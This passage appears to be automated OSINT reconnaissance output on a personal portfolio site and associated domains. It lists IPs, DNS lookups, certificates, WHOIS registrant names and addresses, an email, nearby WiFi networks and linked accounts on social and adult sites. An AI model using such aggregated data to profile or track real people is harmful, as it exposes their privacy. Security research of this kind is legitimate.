"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3700"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "142.250.189.202:443"\n "104.18.28.243:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"fonts.googleapis.com"\n "unicons.iconscout.com"\n "wasimreja.me"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<a href="https://www.linkedin.com/in/wasimreja/" target="_blank"" (Indicator: "linkedin.com")\n "<a href="https://twitter.com/_wasimreja" target="_blank" class="home-social-icon">" (Indicator: "twitter")\n "<i class="uil uil-twitter-alt"></i>" (Indicator: "twitter")\n "<i class="uil uil-twitter-alt contact-icon"></i>" (Indicator: "twitter")\n "Twitter" (Indicator: "twitter")\n "<a href="https://twitter.com/_wasimreja" class="footer-social" target="_blank">" (Indicator: "twitter")\n "<a href="https://www.linkedin.com/in/wasimreja/" class="footer-social"" (Indicator: "linkedin.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar41C.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar38D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002812]\n "Cab38C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab38C.tmp]- [targetUID: 00000000-00002812]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"favicon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "silence_1_.gif" has type "GIF image data version 89a 500 x 682"- [targetUID: N/A]\n "whats%20cooking_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "music%20player_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "task%20buddy_1_.png" has type "PNG image data 1263 x 700 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Tar41C.tmp" has type "data"- Location: [%TEMP%\\Tar41C.tmp]- [targetUID: 00000000-00002812]\n "swiper-bundle.min_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "gcr%20leaderboard_1_.png" has type "PNG image data 1919 x 838 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "typing%20speed%20test_1_.png" has type "PNG image data 1920 x 874 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "notes%20mini_1_.png" has type "PNG image data 1920 x 838 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002812]\n "sandesh_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=7 orientation=upper-left xresolution=98 yresolution=106 resolutionunit=3 software=Adobe Photoshop CC 2017 (Windows) datetime=2020:06:20 11:34:14] progressive precision 8 1920x850 components 3"- [targetUID: N/A]\n "line_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "quizzler_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1652x805 components 3"- [targetUID: N/A]\n "book%20finder_1_.png" has type "PNG image data 1263 x 684 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "dictionary%20app_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "avatar_1_.png" has type "PNG image data 500 x 500 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "urlref_httpswasimreja.me" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "unicons-10_1_.eot" has type "Embedded OpenType (EOT) unicons-10 family"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://wasimreja.me/"\n Pattern match: "https://wasimreja.me"\n Pattern match: "https://swiperjs.com"\n Pattern match: "C.JgU/0$"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "www.microsoft.com0"\n Pattern match: "https://wasimreja.me/assets/img/opengraph.png"\n Pattern match: "https://fonts.googleapis.com"\n Pattern match: "https://fonts.gstatic.com"\n Pattern match: "https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&display=swap"\n Pattern match: "https://unicons.iconscout.com/release/v4.0.0/css/line.css"\n Pattern match: "https://www.linkedin.com/in/wasimreja/"\n Pattern match: "https://github.com/wasimreja"\n Pattern match: "https://twitter.com/_wasimreja"\n Pattern match: "https://www.instagram.com/_wasimreja"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "http://www.w3.org/1999/xlink"\n Pattern match: "https://notes-mini.vercel.app/"\n Pattern match: "https://typing-speed-test.onrender.com/"\n Pattern match: "https://gcr-leaderboard.vercel.app/"\n Pattern match: "https://book-finder.onrender.com/"\n Pattern match: "http://whats-cooking.vercel.app/"\n Pattern match: "https://task-buddy.netlify.app/"\n Pattern match: "https://dictionary-app.onrender.com/"\n Pattern match: "https://quizzler.vercel.app/"\n Pattern match: "https://wasimreja.github.io/music-player/"\n Pattern match: "https://github.com/wasimreja/sandesh"\n Heuristic match: "wr2435@it.jgec.ac.in"\n Pattern match: "https://instagram.com/_wasimreja"\n Heuristic match: "fonts.googleapis.com"\n Heuristic match: "unicons.iconscout.com"\n Heuristic match: "wasimreja.me"\n Pattern match: "https://wasimreja.me/Accept-Language"\n Pattern match: "ns.adobe.com/xap/1.0/"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "http://fontello.comIconscoutunicons-13Regularunicons-13unicons-13Version"\n Pattern match: "http://fontello.comIconscoutunicons-12Regularunicons-12unicons-12Version"\n Pattern match: "http://fontello.comIconscoutunicons-0Regularunicons-0unicons-0Version"\n Pattern match: "http | 185.199.109.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | myLGNet (Net ID: 00:02:A8:C2:91:21) | 50.1188, 8.6843 |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 132.97.148.34.bc.googleusercontent.com | 34.148.97.132 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.200): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.249): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:57 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c443d4879e76326-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2a06:98c1:3120::1 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SX551D17A4D (Net ID: 00:01:E3:D1:7A:4D) | 50.8897, 6.0563 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00root.github.io | 185.199.111.153 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.71.14 |
| 2023-05-12 03:23:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.2:8443 | 188.114.96.0/24 |
| 2023-05-12 02:44:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 116.48.229.35.bc.googleusercontent.com | 35.229.48.116 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | My Passport (2.4 GHz) - 0778A5 (Net ID: 00:00:C0:07:78:A5) | 37.7813933,-122.3918002 |
| 2023-05-12 02:50:56 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:62:27:a6:dc:16:28:de:ae:a0:a4:7d:7e:a0:02:81:25:0e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 21:24:59 2022 GMT
Not After : Mar 18 21:24:58 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c4:7a:cf:72:75:e0:23:b5:24:56:0b:ff:81:dc:
d9:ef:b9:84:a5:cb:15:5a:f2:4d:f6:46:6d:b0:47:
aa:99:c5:97:75:9e:1e:5a:4f:3a:12:c1:33:26:f0:
0f:b9:47:15:ee:28:b3:c5:a0:0e:6e:82:c2:e4:9e:
2f:89:8d:b1:98:56:ae:4e:51:dc:76:c6:4d:f7:a0:
da:11:9a:d1:d4:0e:53:d9:8e:4c:35:dc:f0:9d:a8:
b5:1d:3f:0a:c6:d4:12:00:be:6b:8b:db:1c:eb:ff:
fa:8a:0d:30:cf:48:30:73:35:bc:e5:39:78:d6:97:
a1:00:9f:88:3e:2a:d4:35:22:13:80:4e:57:e4:0b:
6b:33:da:ae:7f:1b:ed:8f:82:10:4f:76:18:82:03:
22:e6:2a:88:53:b9:9a:80:d1:10:21:d7:25:be:5d:
9e:dd:23:0e:2f:8b:44:b5:d9:a6:ea:9a:ef:d4:ac:
24:ea:27:de:5f:35:74:c4:ee:db:95:49:53:28:21:
da:c7:71:d0:ef:75:13:d9:75:8b:84:42:b8:62:af:
7a:1c:85:43:b6:85:1f:19:fe:11:de:22:13:41:a7:
26:69:56:b7:56:8c:31:f6:46:81:6d:dd:94:ae:81:
bb:82:f2:fb:15:03:15:a0:92:6d:46:ee:3b:be:82:
d4:cc:f6:b8:f0:82:0e:be:9c:1b:d5:a9:e7:74:12:
18:51:f1:a4:d7:96:be:07:63:2a:5b:b2:de:3e:8d:
99:72:fa:17:ce:36:64:cf:aa:ef:2b:4c:60:46:d0:
cb:1a:9e:bb:94:71:19:32:32:aa:a0:4f:7c:b5:80:
d2:ac:29:a1:3e:79:7a:46:f9:fc:2c:b9:f9:8b:cb:
59:c4:7c:ae:87:57:d8:e5:12:0a:0b:a5:34:e8:72:
2f:e5:15:84:33:1d:01:b8:f5:d1:2b:ff:10:f9:e7:
ef:0c:be:61:fe:87:b7:d8:4f:dc:f0:08:3e:e4:ba:
53:2e:94:64:aa:29:45:65:cb:b5:3b:5d:cd:a7:33:
69:f9:c8:07:c0:c9:87:da:c3:82:4b:50:90:d2:80:
18:a8:e3:89:70:e0:61:b8:c9:4f:82:66:2b:0e:23:
36:49:33:34:63:e7:8a:70:61:f2:a3:6d:68:5c:13:
84:18:1d:5c:05:3c:2b:f0:28:3d:ae:ff:ba:af:c4:
48:bb:d7:f2:a8:15:4b:68:f4:b5:9d:7c:d4:31:43:
bf:01:12:bc:59:5f:ef:ce:fb:0e:78:b7:62:51:52:
0f:d1:8e:d7:11:fa:d7:0c:57:e7:ee:bd:a5:16:b1:
30:a1:96:90:5b:b4:a4:e1:b1:72:88:e0:56:6f:9c:
5b:43:b9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:29:A0:EB:78:CC:40:89:5B:55:A3:66:D6:68:C3:AE:DF:AB:BB:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 18 22:24:59.092 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:ED:60:61:6F:BC:46:EA:80:D9:9B:7E:
8F:A6:97:51:13:A3:13:6E:09:4B:69:DE:76:DA:06:A4:
9A:F6:AD:26:7A:02:21:00:8D:70:0F:85:A2:37:40:B9:
EB:5B:60:8F:DC:06:DD:16:63:C3:4B:C4:FC:99:B1:34:
98:6B:48:67:B4:F0:C6:4E
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 18 22:24:59.634 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:B5:D7:F6:4B:EA:EE:D1:88:2A:2C:A7:
F5:CC:0E:34:73:06:3D:CB:97:DC:EE:36:A9:A5:D7:84:
82:BC:B5:EB:C6:02:20:24:29:13:50:A0:1B:E8:D7:8C:
B3:4A:9A:51:F0:3A:9F:E5:82:84:2A:82:72:A2:11:F0:
F6:5B:BD:6F:C1:6E:17
Signature Algorithm: sha256WithRSAEncryption
9e:bd:00:c7:d3:5f:8b:8e:53:b7:5b:22:5d:0b:6d:c4:d2:9f:
fb:d0:a2:7c:44:da:e1:f0:45:3d:e8:3d:22:cc:24:5a:a4:77:
b1:7e:a7:5b:7d:47:e3:cc:9f:21:7b:68:ee:4b:fd:96:93:76:
17:26:af:1b:c0:e8:25:4c:33:00:f1:c2:7c:74:4c:aa:65:ed:
92:ae:6a:f9:36:e7:ca:f4:22:6d:f0:eb:29:e7:93:7f:63:23:
5f:e2:ba:1f:83:d2:38:d1:dc:cc:25:4e:61:6b:39:9c:a8:a4:
1a:fc:f9:45:e4:a1:28:63:0f:69:f3:83:90:4b:3d:de:98:18:
fa:e8:6b:3c:fb:c2:5d:0d:ab:ed:f9:00:6d:a0:26:46:2f:05:
46:31:32:5f:a6:1d:17:f4:1e:34:3a:f6:2e:f1:f6:1f:09:08:
8f:de:c7:cd:9f:0a:d6:37:e5:8e:ad:71:44:31:1f:ee:c8:d7:
1e:cb:c5:98:bf:4b:bf:03:59:91:6e:75:8b:e9:11:d9:3b:3a:
e6:90:a3:02:49:4e:21:28:66:07:46:87:31:86:8a:ff:ea:59:
d0:c3:7e:c2:6d:3c:37:07:a6:50:55:a2:45:9b:f8:71:ef:35:
ed:7a:04:62:6e:f1:59:e7:59:4b:40:35:fd:a2:ed:39:31:90:
80:53:1f:29
| battleb0t.xyz |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/nomnom.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c57f0d8baaf3a64-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 03:09:26 | Co-Hosted Site - Domain Whois | No | Whois | 3 | 0 | 4 | 0 | None | Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com/
Updated Date: 2023-01-20T18:05:08.0Z
Creation Date: 2022-12-18T04:19:38.0Z
Registry Expiry Date: 2031-12-18T23:59:59.0Z
Registrar: Name.com, Inc
Registrar IANA ID: 625
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: YN
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1CNB.NAME.COM
Name Server: NS2KNZ.NAME.COM
Name Server: NS3CNA.NAME.COM
Name Server: NS4BLX.NAME.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: jrupp@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:26.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com
Updated Date: 2023-01-20T18:05:08Z
Creation Date: 2022-12-18T04:19:38Z
Registrar Registration Expiration Date: 2031-12-18T23:59:59Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Reseller:
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Aaron Young
Registrant Organization:
Registrant Street: 408 Longquan Rd.
Registrant City: KM
Registrant State/Province: YN
Registrant Postal Code: 650000
Registrant Country: CN
Registrant Phone: Non-Public Data
Registrant Email: https://www.name.com/contact-domain-whois/007316.xyz/registrant
Registry Admin ID: Not Available From Registry
Admin Name: Aaron Young
Admin Organization:
Admin Street: 408 Longquan Rd.
Admin City: KM
Admin State/Province: YN
Admin Postal Code: 650000
Admin Country: CN
Admin Phone: Non-Public Data
Admin Email: https://www.name.com/contact-domain-whois/007316.xyz/admin
Registry Tech ID: Not Available From Registry
Tech Name: Aaron Young
Tech Organization:
Tech Street: 408 Longquan Rd.
Tech City: KM
Tech State/Province: YN
Tech Postal Code: 650000
Tech Country: CN
Tech Phone: Non-Public Data
Tech Email: https://www.name.com/contact-domain-whois/007316.xyz/tech
Name Server: ns2knz.name.com
Name Server: ns4blx.name.com
Name Server: ns3cna.name.com
Name Server: ns1cnb.name.com
DNSSEC: unSigned
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in the Name.com, Inc. WHOIS database is provided by Name.com, Inc. for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Name.com, Inc. does not guarantee its accuracy. Users accessing the Name.com, Inc. WHOIS service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Name.com, Inc., except as reasonably necessary to register domain names or modify existing registrations. When using the Name.com, Inc. WHOIS service, please consider the following: the WHOIS service is not a replacement for standard EPP commands to the SRS service. WHOIS is not considered authoritative for registered domain objects. The WHOIS service may be scheduled for downtime during production or OT&E maintenance periods. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis, for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.name.com/layered-access-request . Name.com, Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
| 007316.xyz |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.101): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:33:45 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | http://ns.adobe.com/xap/1.0/
XPhotoshop 3.0
Photo Booth
ICC_PROFILE
mntrRGB XYZ
acspAPPL
-appl
bdscm
vcgt
0ndin
>chad
8bTRC
aagg
desc
Display
0daDK
FnlNL
bfiFI
xitIT
$viVN
.skSK
<zhCN
$ruRU
RenGB
vfrFR
vesXL
"elGR
4svSE
VtrTR
fptPT
zjaJP
Dtext
A l
!H!u!
"'"U"
'I'z'
-A-v-
/$/Z/
050l0
676r6
7$7`7
:6:t:
<'<e<
> >`>
?!?a?
B0BrB
F"FgF
P'PqP
nmmod
B`@$s
eww<`
FR'<c
zR0f9
PFOPx
3nX7
U?.0H
Xax9<
z41jH
@gc3nw9bq
Kj @yS
S`YdR
pj2OL
MZw'bp
:'W9q
661:H
SInxX
\1<qXs\
mnMuV:
TjO99
VgDer
eA$tn:
n3 3.y<
y78$p
o XfI
\XYbs
HmJ92
5m6s4W6
BMNnW
Ye8-uc<
-8-"z
K1yeb
WOCiB
:sRWG
p1A1w$
p!O9'
9_FTOO
TNCaA
pEz\3
'-fp?
7m9 z
6:WE:
?Ol<U
$hpp@
K$_4e
zDrA9
.>`x?
\rKis
zWGml
NOAVR
9?S\. | https://pics.battleb0t.xyz/images/jcqn.jpg |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Pillowfort (Category: social)
https://www.pillowfort.social/login | login |
| 2023-05-12 02:45:32 | Malicious IP Address | Yes | PhishStats | 0 | 1 | 2 | 0 | None | Phishstats [185.199.108.153]
| 185.199.108.153 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Pornhub Users (Category: XXXPORNXXX)
https://www.pornhub.com/users/Altpapier | Altpapier |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BriteMedia (Net ID: 00:00:72:20:59:DD) | 41.8781, -87.6298 |
| 2023-05-12 02:44:09 | Co-Hosted Site | No | SSL Certificate Analyzer | 4 | 1 | 1 | 0 | None | www.github.com | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-001
(Net ID: 00:02:72:8E:62:D1) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.248): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx BYOD (Net ID: 00:01:21:26:42:51) | 41.8781, -87.6298 |
| 2023-05-12 02:46:50 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
02:5a:61:0f:58:eb:84:f1:ad:53:ae:03:dc:a9:84:7a
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1
Validity
Not Before: Dec 21 00:00:00 2022 GMT
Not After : Jan 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Netlify, Inc, CN=*.netlify.app
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:64:c3:ab:83:a1:9f:9b:f7:ff:e5:00:bf:41:ae:
cd:d1:cd:1c:5d:8d:4d:62:fb:0e:e4:90:33:13:2d:
b5:45:91:e6:7a:26:a0:5e:01:ae:25:84:fb:d5:88:
23:7e:13:7e:a9:d3:a5:de:69:2d:91:69:c3:12:86:
5a:94:02:42:28
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:0A:BC:08:29:17:8C:A5:39:6D:7A:0E:CE:33:C7:2E:B3:ED:FB:C3:7A
X509v3 Subject Key Identifier:
3E:6A:BE:6E:25:AC:12:10:AB:BE:F1:EB:A7:A9:BC:6D:88:7D:54:8F
X509v3 Subject Alternative Name:
DNS:*.netlify.app, DNS:netlify.app
